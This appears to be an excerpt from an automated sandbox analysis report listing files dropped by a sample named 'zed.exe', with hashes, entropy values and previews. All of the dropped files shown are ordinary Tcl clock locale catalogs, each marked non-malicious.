                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CA DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset fr_CA TIME_FORMAT "%T".. ::msgcat::mcset fr_CA TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CA DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):288
                                                                                                                                                                                                                                            Entropy (8bit):4.913241133684606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoFt28oF+3vLjoF+3v6mjo++3vnFDoAkvn:4EnLB383yte+3vs+3v6/3v9dmn
                                                                                                                                                                                                                                            MD5:83FC7EBA68C3727F7C13C8EEAF79823F
                                                                                                                                                                                                                                            SHA1:81C27F9B97F5F5190F7189230535EC09CD228158
                                                                                                                                                                                                                                            SHA-256:290CA6EB74BAEAC4E2420D0755D148849F89EE87E37860F25CBB7B8AFA3EDCBC
                                                                                                                                                                                                                                            SHA-512:35DA46558A246D7B3FAB02208001CE986E2E6DD88D6318AF743F4E81CA6920471D1425BB009A7476A79E7F61E1353C027B765331CD8EFA07A9E884DCB73F2195
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CH DATE_FORMAT "%d. %m. %y".. ::msgcat::mcset fr_CH TIME_FORMAT "%T".. ::msgcat::mcset fr_CH TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CH DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1188
                                                                                                                                                                                                                                            Entropy (8bit):4.314271783103334
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR835k0CM/hlrXa754pD73/tKSx54pbIK5f2CA:43W05rXUa173/VadDA
                                                                                                                                                                                                                                            MD5:67D137E5D853DB61A4B4264871E793F7
                                                                                                                                                                                                                                            SHA1:4280E7F662DE792175AF8B4C93874F035F716F0F
                                                                                                                                                                                                                                            SHA-256:880806867ACABD9B39E3029A5ADD26B690CC5709082D43B0959EBA725EA07AB5
                                                                                                                                                                                                                                            SHA-512:C27B745143539D3E6D94BB754DCA35065CDE9B1AA6EE038D47F658175CFACC20236124D38BE5BBB03CAF8F613BD748C43CB8DFCC9234E915D18B5A477BAEF94E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga DAYS_OF_WEEK_ABBREV [list \.. "Domh"\.. "Luan"\.. "M\u00e1irt"\.. "C\u00e9ad"\.. "D\u00e9ar"\.. "Aoine"\.. "Sath"].. ::msgcat::mcset ga DAYS_OF_WEEK_FULL [list \.. "D\u00e9 Domhnaigh"\.. "D\u00e9 Luain"\.. "D\u00e9 M\u00e1irt"\.. "D\u00e9 C\u00e9adaoin"\.. "D\u00e9ardaoin"\.. "D\u00e9 hAoine"\.. "D\u00e9 Sathairn"].. ::msgcat::mcset ga MONTHS_ABBREV [list \.. "Ean"\.. "Feabh"\.. "M\u00e1rta"\.. "Aib"\.. "Beal"\.. "Meith"\.. "I\u00fail"\.. "L\u00fan"\.. "MF\u00f3mh"\.. "DF\u00f3mh"\.. "Samh"\.. "Noll"\.. ""].. ::msgcat::mcset ga MONTHS_FULL [list \.. "Ean\u00e1ir"\.. "Feabhra"\.. "M\u00e1rta"\.. "Aibre\u00e1n"\.. "M\u00ed na Bealtaine"\.. "Meith"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.824539027053997
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xobHAygDobHAqo+3vLjobHAqo+3v6mjobHAy9+3vnFDoAkv:4EnLB383p23vy3v6a3v9dmn
                                                                                                                                                                                                                                            MD5:C27BD7F317AAADB380F4C38AE0D2FDA6
                                                                                                                                                                                                                                            SHA1:79870A0E68AA0A9B301414EDC21889F83BB81E40
                                                                                                                                                                                                                                            SHA-256:3F9615C617D3CDBC1E127B3EFEE785B0CB5E92E17B7DABAC80DA2BEAF076362C
                                                                                                                                                                                                                                            SHA-512:3605B9A914284CF1D3CC90DF2F21A86C0472AEE59800942DC93D842C7AE164E1DA72813787F163DC80B72269D2C391953ABAD6A8B72CCF069BEE96D418A173E9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga_IE DATE_FORMAT "%d.%m.%y".. ::msgcat::mcset ga_IE TIME_FORMAT "%T".. ::msgcat::mcset ga_IE TIME_FORMAT_12 "%T".. ::msgcat::mcset ga_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):997
                                                                                                                                                                                                                                            Entropy (8bit):4.120890519790248
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83okzalCcPdJ5rK8yzMY4JlV1ZDqqIkFo8w:43JkPj9K8y4HHZLIQtw
                                                                                                                                                                                                                                            MD5:A3D098C1A47E380F7C25233A52FBDE38
                                                                                                                                                                                                                                            SHA1:C97E4EAA9E7A7F99950F422B93C57134B532C639
                                                                                                                                                                                                                                            SHA-256:34D61B49DBF9584893051FFB458D6DE9E7E2E7774AC0011F70C4DD4184EBA81C
                                                                                                                                                                                                                                            SHA-512:4687AB3D2FAA65FED90678EBC08C074959E93A9FEFAF3D61EEE39DB08FD200CB57C0DDB4DDBF6451FE1EF5E07EA976EDEF830769FF403CE51734129CEF24DA9F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Lun"\.. "Mar"\.. "M\u00e9r"\.. "Xov"\.. "Ven"\.. "S\u00e1b"].. ::msgcat::mcset gl DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Luns"\.. "Martes"\.. "M\u00e9rcores"\.. "Xoves"\.. "Venres"\.. "S\u00e1bado"].. ::msgcat::mcset gl MONTHS_ABBREV [list \.. "Xan"\.. "Feb"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Xu\u00f1"\.. "Xul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset gl MONTHS_FULL [list \.. "Xaneiro"\.. "Febreiro"\.. "Marzo"\.. "Abril"\.. "Maio"\.. "Xu\u00f1o"\.. "Xullo"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Decembro"\.. ""]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.886176304042503
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoPhkgMoPxsF3v6ay/5oPhk9+3vR6HyFvn:4EnLB383WrfK3v6ay/WJ3voSVn
                                                                                                                                                                                                                                            MD5:78B9163C5E8E5E7049CBF91D1A5889A4
                                                                                                                                                                                                                                            SHA1:F2F07AF3D79D61C8E0C73B13E2CA8266E10E396B
                                                                                                                                                                                                                                            SHA-256:B5688CA07D713227B713655877710258CD503617E8DF79293A971649E3134F05
                                                                                                                                                                                                                                            SHA-512:E86074B687670542CFA097C94D150292E1A73C9F231E92CD84386580A446569CC6F8F5817F46ED64A1D00F95D59F6F1F5D4B961DF3C8335938D83F3517794353
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl_ES DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gl_ES TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gl_ES DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1084
                                                                                                                                                                                                                                            Entropy (8bit):4.213672208102291
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR832vTXAC2/fS5JfaCroeLaCAQbSm5qJe1:43QTXs32zrf
                                                                                                                                                                                                                                            MD5:518FC3964D50854081FB79189A42D3E7
                                                                                                                                                                                                                                            SHA1:59392F16CD56E3E6A685F78974D539FB3A972B98
                                                                                                                                                                                                                                            SHA-256:404795F2C88D0038F9ED0B5120A251D26EDF8B236E1B1698BC71ACD4DC75AC45
                                                                                                                                                                                                                                            SHA-512:E5C88CAB8741D631938CEC2E0959C0FE26685C395F5F9F4F1B5C9E146E84D23D897CD7A823AB46D4B62C590AE15EC76B87EB59308ACFB1BB6F61398890B43622
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv DAYS_OF_WEEK_ABBREV [list \.. "Jed"\.. "Jel"\.. "Jem"\.. "Jerc"\.. "Jerd"\.. "Jeh"\.. "Jes"].. ::msgcat::mcset gv DAYS_OF_WEEK_FULL [list \.. "Jedoonee"\.. "Jelhein"\.. "Jemayrt"\.. "Jercean"\.. "Jerdein"\.. "Jeheiney"\.. "Jesarn"].. ::msgcat::mcset gv MONTHS_ABBREV [list \.. "J-guer"\.. "T-arree"\.. "Mayrnt"\.. "Avrril"\.. "Boaldyn"\.. "M-souree"\.. "J-souree"\.. "Luanistyn"\.. "M-fouyir"\.. "J-fouyir"\.. "M.Houney"\.. "M.Nollick"\.. ""].. ::msgcat::mcset gv MONTHS_FULL [list \.. "Jerrey-geuree"\.. "Toshiaght-arree"\.. "Mayrnt"\.. "Averil"\.. "Boaldyn"\.. "Mean-souree"\.. "Jerrey-souree"\.. "Luanistyn"\.. "Mean-fouyir"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.936566750568767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoQbtvMoQLE3v6ay/5oQbto+3vR6HyFvn:4EnLB383PbtvALE3v6ay/PbtF3voSVn
                                                                                                                                                                                                                                            MD5:0B6BE614EF5F5F25A30D2D33701A9F94
                                                                                                                                                                                                                                            SHA1:65800FBD73D9DAE550E04E1D818A6B9D1AEF86FE
                                                                                                                                                                                                                                            SHA-256:86CABF3B9360C0E686CC4CBEB843E971C28BC6D35210ED378B54EB58CC41F3D5
                                                                                                                                                                                                                                            SHA-512:376D21B38DA49A8F7C2983F2B808FD55AC9F6383BC66DF28DB99DBF61FDC9FFF8CD20F077EC3ED873EF47F0F613BDD9AD02DFFB1CB51F9A36715C7FC798C3B70
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1990
                                                                                                                                                                                                                                            Entropy (8bit):4.298934047406144
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83Y71LCLxL0eCLbCLKCLaCLXL7CLB0p1dLGCoCLU5LT5Gv5LJ9p5LnLEHLGCh:43sl7KqpU/nNbhbOezd2ICn
                                                                                                                                                                                                                                            MD5:A0E60036EB17208A449AAFC3AAAE622C
                                                                                                                                                                                                                                            SHA1:9D7479BA85FBB00A2DF2B61F4ED2CBEA8F1EC8C3
                                                                                                                                                                                                                                            SHA-256:787DA79AF58872BF45AB09E3B6A920A4496B5BD8A4F3C7F010CF013EC2E8EFE0
                                                                                                                                                                                                                                            SHA-512:46D12C14B5736E5EA97EB728BF58999E9D7C2CF910D8F5AFA3F5D3A86329ABF41A3E2BEBD81EE4EF64BEA0DC173B77A9FE12471C1BD9D768ED552A55B3B80213
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \.. "\u05d0"\.. "\u05d1"\.. "\u05d2"\.. "\u05d3"\.. "\u05d4"\.. "\u05d5"\.. "\u05e9"].. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \.. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\.. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\.. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\.. "\u05e9\u05d1\u05ea"].. ::msgcat::mcset he MONTHS_ABBREV [list \.. "\u05d9\u05e0\u05d5"\.. "\u05e4\u05d1\u05e8"\.. "\u05de\u05e8\u05e5"\.. "\u05d0\u05e4\u05e8"\.. "\u05de\u05d0\u05d9"\.. "\u05d9\u05d5\u05e0"\.. "\u05d9\u05d5\u05dc"\.. "\u05d0\u05d5\u05d2"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1777
                                                                                                                                                                                                                                            Entropy (8bit):4.2117128941697715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:438n4kALqrU1fbokQTbWqrU1fbokQTw38:28OD86D8gM
                                                                                                                                                                                                                                            MD5:4219A929E27308ADC04A9F368F063F38
                                                                                                                                                                                                                                            SHA1:FA728EEBA8751F4CE032ED32AECFDE124D1B68E2
                                                                                                                                                                                                                                            SHA-256:192F4A8E77E1627712F85533C9896EF6A040157C7BD56DF3A4A7FA56AD6746C2
                                                                                                                                                                                                                                            SHA-512:223B137AC1FC15908F5541067736EF3A29493549B963393EB78660036A82982E57CFC4AD09CBD33D32A5187FF9F4ACFB5F83A0C974702434B7FAD1B2539B7F76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0932\u0935\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset hi MONTHS_ABBREV [list \.. "\u091c\u0928\u0935\u0930\u0940"\.. "\u092b\u093c\u0930\u0935\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u0905\u092a\u094d\u0930\u0947\u0932"\.. "\u092e\u0908"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u093e\u0908"\.. "\u0905\u0917\u0938\u094d\u0924"\.. "\u0938\u093f\u0924\u092e\u094d\u092c\u0930"\.. "\u0905\u0915\u094d\u091f\u0942\u092c\u0930"\.. "\u0928\u0935\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9286948144352865
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xocv+IZoz3v6ry/5oco+3v+6f6HyFvn:4EnLB383Jvlg3v6ry/JF3vmSVn
                                                                                                                                                                                                                                            MD5:1C1E1484EA0286175FADCB90937C9F34
                                                                                                                                                                                                                                            SHA1:5CA1BF19021D529CB3B3A308EFFFCA7E4D073640
                                                                                                                                                                                                                                            SHA-256:5A3BF0DD61BFB5A2BF75E96B11E0E3528FFAB720A0BF1923853606F8CAF0E76D
                                                                                                                                                                                                                                            SHA-512:F9A43E1E18ADB6DC6B18BEDC3303A99F514DF6CA54F12100989F734233012D7D60216116915351CCACC12F6942795BF8F3BBD26B15A86E88101067D64BEE54F5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset hi_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset hi_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1171
                                                                                                                                                                                                                                            Entropy (8bit):4.36311224714184
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83dVX79VIE9bLTWnh7rT+5dPcdvgrNv5KvOA1:43kmrQ7n+odIrJ6OS
                                                                                                                                                                                                                                            MD5:906963A3AD09EAC781B35C190B77484E
                                                                                                                                                                                                                                            SHA1:E5AA49DA9C4987EAFA839115F84612426EB8615E
                                                                                                                                                                                                                                            SHA-256:105A9180BC5D23738183374FA0EA8DD80484BF3947E1432E515BDC2913C017D9
                                                                                                                                                                                                                                            SHA-512:557BD1C8306750D09215D9774069A52C7D60E03DE2DF39FF909A8F658AB0565739D127E24ACDC96F736C69A71BEFA30B8A30BB489C7B7FDEA85386C802166349
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hr DAYS_OF_WEEK_ABBREV [list \.. "ned"\.. "pon"\.. "uto"\.. "sri"\.. "\u010det"\.. "pet"\.. "sub"].. ::msgcat::mcset hr DAYS_OF_WEEK_FULL [list \.. "nedjelja"\.. "ponedjeljak"\.. "utorak"\.. "srijeda"\.. "\u010detvrtak"\.. "petak"\.. "subota"].. ::msgcat::mcset hr MONTHS_ABBREV [list \.. "sij"\.. "vel"\.. "o\u017eu"\.. "tra"\.. "svi"\.. "lip"\.. "srp"\.. "kol"\.. "ruj"\.. "lis"\.. "stu"\.. "pro"\.. ""].. ::msgcat::mcset hr MONTHS_FULL [list \.. "sije\u010danj"\.. "velja\u010da"\.. "o\u017eujak"\.. "travanj"\.. "svibanj"\.. "lipanj"\.. "srpanj"\.. "kolovoz"\.. "rujan"\.. "listopad"\.. "studeni"\.. "prosinac"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1381
                                                                                                                                                                                                                                            Entropy (8bit):4.511450677731002
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83IFb7ZTmKrkAYm2LZyyApLDV2uZi5WF+shHUTyvtsv+:43C3ZTmKQAyZyyAp0BotK+
                                                                                                                                                                                                                                            MD5:E398158EE1CD49CB5286D9642D4A61DD
                                                                                                                                                                                                                                            SHA1:A93A588B0ADD198C067C4BB070DC1E5170E6E208
                                                                                                                                                                                                                                            SHA-256:993475532F89E1EA7214ADB265294040862305612D680CFF01DD20615B731CCC
                                                                                                                                                                                                                                            SHA-512:9E5791FB97110FE5F7A1F49FF2ED8801A05E49D5B9AF579474C0081073D2B40ECFFE6E4EB5B61F12B1995FDCC0A557CB572E5E116F951FD286A6254253DAEC01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hu DAYS_OF_WEEK_ABBREV [list \.. "V"\.. "H"\.. "K"\.. "Sze"\.. "Cs"\.. "P"\.. "Szo"].. ::msgcat::mcset hu DAYS_OF_WEEK_FULL [list \.. "vas\u00e1rnap"\.. "h\u00e9tf\u0151"\.. "kedd"\.. "szerda"\.. "cs\u00fct\u00f6rt\u00f6k"\.. "p\u00e9ntek"\.. "szombat"].. ::msgcat::mcset hu MONTHS_ABBREV [list \.. "jan."\.. "febr."\.. "m\u00e1rc."\.. "\u00e1pr."\.. "m\u00e1j."\.. "j\u00fan."\.. "j\u00fal."\.. "aug."\.. "szept."\.. "okt."\.. "nov."\.. "dec."\.. ""].. ::msgcat::mcset hu MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "m\u00e1rcius"\.. "\u00e1prilis"\.. "m\u00e1jus"\.. "j\u00fanius"\.. "j\u00falius"\.. "augusztus"\.. "szeptembe
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):961
                                                                                                                                                                                                                                            Entropy (8bit):4.02166638427728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83dcTcWKutdXaMmEfc2ftdT2dHblWZ0VT:43dQrKutdntdI8g
                                                                                                                                                                                                                                            MD5:191ACF2E8A8F10A1360B283D42886382
                                                                                                                                                                                                                                            SHA1:EE2C00D021381EA638B6CE3F395DEA5F8491ED9B
                                                                                                                                                                                                                                            SHA-256:41C0C3D3B4491E9B36E719466503EFCD325175CB7824C4A5055CB113D347BE0F
                                                                                                                                                                                                                                            SHA-512:29BC4F7D3FAE7DE392B175FEA76138FA823B7D9D0B051A19A73F7D36D51DE34E0D0C7C129867307ABF51FC92E70853C15BD96B8484AD21EAB0A8EB83B0411E03
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id DAYS_OF_WEEK_ABBREV [list \.. "Min"\.. "Sen"\.. "Sel"\.. "Rab"\.. "Kam"\.. "Jum"\.. "Sab"].. ::msgcat::mcset id DAYS_OF_WEEK_FULL [list \.. "Minggu"\.. "Senin"\.. "Selasa"\.. "Rabu"\.. "Kamis"\.. "Jumat"\.. "Sabtu"].. ::msgcat::mcset id MONTHS_ABBREV [list \.. "Jan"\.. "Peb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Agu"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset id MONTHS_FULL [list \.. "Januari"\.. "Pebruari"\.. "Maret"\.. "April"\.. "Mei"\.. "Juni"\.. "Juli"\.. "Agustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.904408530699153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo0kGMo0F/W3v6ay/5o0kT+3vR6HyFvn:4EnLB383wG33v6ay/wK3voSVn
                                                                                                                                                                                                                                            MD5:FEB4D50576BF3E11A0A40FD29ABE35A7
                                                                                                                                                                                                                                            SHA1:8CEAA187C8AA5EC101743060A877D039850964CA
                                                                                                                                                                                                                                            SHA-256:BA7FC0C0452D3E482DB6E19BDF512CACED639BA72B92ED8F66D80B52FEA11AC0
                                                                                                                                                                                                                                            SHA-512:8B5D18E3D6628F369FB387C8EF08CC80000E0CBE500972958F4AD75F1C2F0DD6058F9777BD7DD0D7C26E7ECAA65E5071E2BF51B560973E88637942116C7576FB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id_ID DATE_FORMAT "%d %B %Y".. ::msgcat::mcset id_ID TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset id_ID DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1305
                                                                                                                                                                                                                                            Entropy (8bit):4.457417703528286
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83XVhVTeMVHGPbfXSmWzaZlfFxUQbW1U6ZY95n123etvmv3eTn:43Xz0b/uzaZtXUMw8n
                                                                                                                                                                                                                                            MD5:ACF0452D5BB6D36A40061D2B0AF4D7A6
                                                                                                                                                                                                                                            SHA1:9DF4D88F1962A672EFBDDE524550F7A5D02D446D
                                                                                                                                                                                                                                            SHA-256:778BE3D6BFE2DFFB64FF1AFB9EC8351A3343B314CF93A68E8F7FD1073EE122BB
                                                                                                                                                                                                                                            SHA-512:34CC02D7D28B5E161ED10250C214375561FD3D00979BFB8BCF3DB72A81BD9B7C225301528B400F7C54D8B6379F772EB6477D5D03F2CF7DC4DD19D22AEEC151B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset is DAYS_OF_WEEK_ABBREV [list \.. "sun."\.. "m\u00e1n."\.. "\u00feri."\.. "mi\u00f0."\.. "fim."\.. "f\u00f6s."\.. "lau."].. ::msgcat::mcset is DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nudagur"\.. "\u00feri\u00f0judagur"\.. "mi\u00f0vikudagur"\.. "fimmtudagur"\.. "f\u00f6studagur"\.. "laugardagur"].. ::msgcat::mcset is MONTHS_ABBREV [list \.. "jan."\.. "feb."\.. "mar."\.. "apr."\.. "ma\u00ed"\.. "j\u00fan."\.. "j\u00fal."\.. "\u00e1g\u00fa."\.. "sep."\.. "okt."\.. "n\u00f3v."\.. "des."\.. ""].. ::msgcat::mcset is MONTHS_FULL [list \.. "jan\u00faar"\.. "febr\u00faar"\.. "mars"\.. "apr\u00edl"\.. "ma\u00ed"\.. "j\u00fan\u00ed"\.. "j\u00fal\
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1294
                                                                                                                                                                                                                                            Entropy (8bit):4.282101355195382
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83JYEVI2vfYpQjAOnhWBIIsmdC2lkOKk+Z+FoPJ6G3vesvY:43JZVB8eAOnh4IzR2+J6G/eKY
                                                                                                                                                                                                                                            MD5:3354A6FC06C298E33AA14163929E56EB
